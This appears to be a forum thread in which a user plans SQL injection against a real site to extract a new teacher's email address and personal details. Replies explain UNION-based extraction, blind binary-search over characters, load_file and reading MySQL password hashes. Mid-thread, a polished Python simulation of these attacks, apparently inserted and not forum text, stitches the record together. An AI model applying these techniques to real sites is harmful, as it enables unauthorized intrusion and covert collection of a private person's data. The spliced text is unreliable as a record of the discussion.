Topic: "SQL exploit" (page 1 of 1)

moose
hi guys,
Now I have found my first site which is SQL-injectable :)
I've searched for information about my new teacher and I found this site. Now I'm trying to get the email address of this teacher out of the database to send her a little welcome mail :)
I'll also send the webmaster an email on how to fix this; it's a really simple one where just ' has to be filtered.

I know a lot of column names (like email^^) but I have to get the name of the table, because I want to do something like "select email AS id from table_xyz"
(as email isn't shown and id is)

But how can I get this table_xyz? I guessed a lot of things, but none worked. Or is there another possibility to "rename" columns than with AS in the select part?

edit: She played a little game with us to get to know us and she didn't really introduce herself. So I think she'll do this tomorrow. So I've searched for information to be able to say something like "you forgot to tell us that you like playing volleyball"^^
Edited by moose on 17.09.2007 20:08:21
unknown user
depends on what rdbms it is.

usually user(), database(), version()
give you a hint as to how it might be named (for example, if they are German, tables will probably be too) and what
rdbms it is you are talking to

-If it's Oracle, you can get it from system.tab (unless protected)
-if it's PostgreSQL you can get it from... hell, I don't know this by heart,
-if it's MySQL it's not that trivial, but you could get the usernames/hashes from mysql.user and mysql.database iirc, and if that doesn't give you access to some admin panel through the site, there is still a chance that you can just connect to the SQL server from outside the network. Shouldn't be possible ... but people just don't care about basic network security
-if it's msql there are some funny error messages, but you won't run into this too often

even if you can't get the table/column names, there are tricks to get more data.

an obvious one is testing the load_file() function. Should be protected, but isn't always. It would allow you to load a file.
needless to say, you just load some of the web scripts and read the table names from there.

depending on the version of the rdbms you can also search for known vulnerabilities; some people just don't like
updating.

In conclusion, chances are pretty good that you can get quite a bit more than email addresses.

moose
user(): I don't know
database(): I don't know the name, but it's MySQL
version(): 4.0 or newer
I'm quite sure the name is German (the attributes were German) and the table has the prefix con_
I don't think there are hashes as it is no login table, but just a list of persons
I can't get error messages (I think they set error_reporting(0);)
The load data function ... well ... If I knew the table name I would use it like "UPDATE [table] SET [col]=LOAD_FILE('[/srv/www/htdocs/file.php]') WHERE id=1;"
But as the query is like "SELECT * FROM table WHERE id= '".$_GET['id']."';" I have to exploit the unfiltered $_GET['id'] and I think it is not possible to "insert" the value of load_file into a variable...

And I didn't get the email addresses as they are not shown ... I just got a full list of all members and a list of some used column names. email is one column.

edit: It can be done like this, can't it? SELECT id,name FROM user WHERE user_ID = 1 UNION SELECT 1,LOAD_FILE('SELECT 1 AS id, LOAD_FILE('../../../srv/www/htdocs/index.php')');
I'll have to try this ... but now I have to go to school :)
thank you rhican
unknown user
information for educational purposes only, of course

user() and the other functions are MySQL functions

just do a binary search
? ... AND ascii(substring(user(),x,30)) > y
to determine the values.

and before you try to use load_file you need to check that it isn't disabled, so do
AND load_file(some ABSOLUTE path) > 0; there is only a 1 in 4 chance it's enabled, I
would estimate. It's off by default in most setups but some sites enable it because
they want to use it. It has to be an absolute path; this is the main reason why
"full path disclosure" bugs are bugs.

mysql.user is a table with the username and password of the SQL users; getting the data
from there can be helpful. the password is hashed by the worst algorithm imaginable.
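The two techniques discussed so far in this thread, the UNION trick from the first post (getting a hidden column shown in the position of a displayed one) and the character-by-character binary search over ascii(substring(...)) > y from the reply above, as an added Python example; this is not code from the thread. It simulates the vulnerable PHP query ("SELECT * FROM table WHERE id= '".$_GET['id']."';") against an in-memory SQLite database. The table name con_personen, its columns and the two rows are constructed assumptions (the thread only says the table has a con_ prefix and an email column that is not displayed), and SQLite's unicode()/substr() stand in for MySQL's ascii()/substring(). The search takes one character per position, so the substring length is 1, and the function counts how many page requests the extraction costs. A parameterized version of the same lookup is included beside the vulnerable one.

```python
import sqlite3

# Constructed sample rows (hypothetical; the thread only says the table has a
# "con_" prefix, German column names and an "email" column that is never shown).
ROWS = [
    (1, "Anna Beispiel", "anna.beispiel@example.invalid"),
    (2, "Bernd Muster", "bernd.muster@example.invalid"),
]


def make_db():
    """In-memory SQLite stand-in for the site's MySQL database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE con_personen (id INTEGER, name TEXT, email TEXT)")
    db.executemany("INSERT INTO con_personen VALUES (?, ?, ?)", ROWS)
    return db


def vulnerable_lookup(db, user_input):
    """Mirrors the PHP quoted in the thread:
       "SELECT * FROM table WHERE id= '".$_GET['id']."';"
    The id is concatenated unescaped. The page renders only id and name, so
    the result is a list of (id, name) pairs; email is fetched but never
    displayed. A SQL error shows nothing, like error_reporting(0)."""
    sql = "SELECT * FROM con_personen WHERE id = '" + user_input + "';"
    try:
        rows = db.execute(sql).fetchall()
    except sqlite3.Error:
        return []
    return [(r[0], r[1]) for r in rows]


def safe_lookup(db, user_input):
    """Hardened form: a bound parameter, so the input is data, never SQL."""
    sql = "SELECT * FROM con_personen WHERE id = ?"
    return [(r[0], r[1]) for r in db.execute(sql, (user_input,)).fetchall()]


# UNION trick: the hidden email column is placed in the position the page
# renders as "id". No AS alias is needed: a UNION takes its column names from
# the first SELECT, so only position and column count matter. The trailing
# "-- " comments out the closing quote and semicolon of the original query.
UNION_PAYLOAD = "x' UNION SELECT email, name, NULL FROM con_personen -- "


def blind_extract(db, subquery, max_len=64):
    """Boolean-based blind extraction by binary search, one character per
    position, as in the reply above (... AND ascii(substring(x,pos,1)) > y).
    SQLite spells the functions unicode()/substr(); MySQL uses ascii()/
    substring(). The page is the yes/no oracle: the row for id 1 is shown
    only while the injected condition is true. Returns (value, requests)."""
    out, requests = [], 0
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127  # assumes ASCII content; widen for UTF-8 code points
        while lo < hi:
            mid = (lo + hi) // 2
            payload = f"1' AND unicode(substr(({subquery}), {pos}, 1)) > {mid} -- "
            requests += 1
            if vulnerable_lookup(db, payload):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            # past the end of the string: substr() yields '' and unicode('')
            # is NULL, so every comparison is false and the search lands on 0
            break
        out.append(chr(lo))
    return "".join(out), requests


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_lookup(db, "1"))
    print(vulnerable_lookup(db, UNION_PAYLOAD))   # emails appear in the id slot
    print(safe_lookup(db, UNION_PAYLOAD))         # [] : payload is just a string
    print(blind_extract(db, "SELECT email FROM con_personen WHERE id = 1"))
```

Each position costs exactly seven requests for a 0..127 search space, plus seven more to detect the end of the string, so a 29-character address takes 210 page loads; the UNION payload gets every address in one request, which is why the UNION route is tried first and the blind search is the fallback when the injected columns are not displayed.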
moose
cool :D
I found this one http://dev.mysql.com/doc/refman/4.1/en/information-functions.html
it's version 4.0 (this one was released 03.2003 ... an update wouldn't be bad, I think)
now I know the user and I am able to get the database name
LOAD_FILE() doesn't work

I could also test if the server's system clock is working right^^ (CURDATE())

Is this perhaps helpful? show_tables

another thing I've found is this:
Quote:

The SELECT ... INTO OUTFILE 'file_name' form of SELECT writes the selected rows to a file. The file is created on the server host, so you must have the FILE privilege to use this syntax. file_name cannot be an existing file, which among other things prevents files such as /etc/passwd and database tables from being destroyed. As of MySQL 5.1.6, the character_set_filesystem system variable controls the interpretation of the filename.

but as I don't want to destroy anything, this is not helping me
Edited by moose on 18.09.2007 18:30:47
unknown user
unless you get the logins from mysql.user and get to log in to the database server directly,
it's very unlikely that you will ever be able to use the "show tables" functionality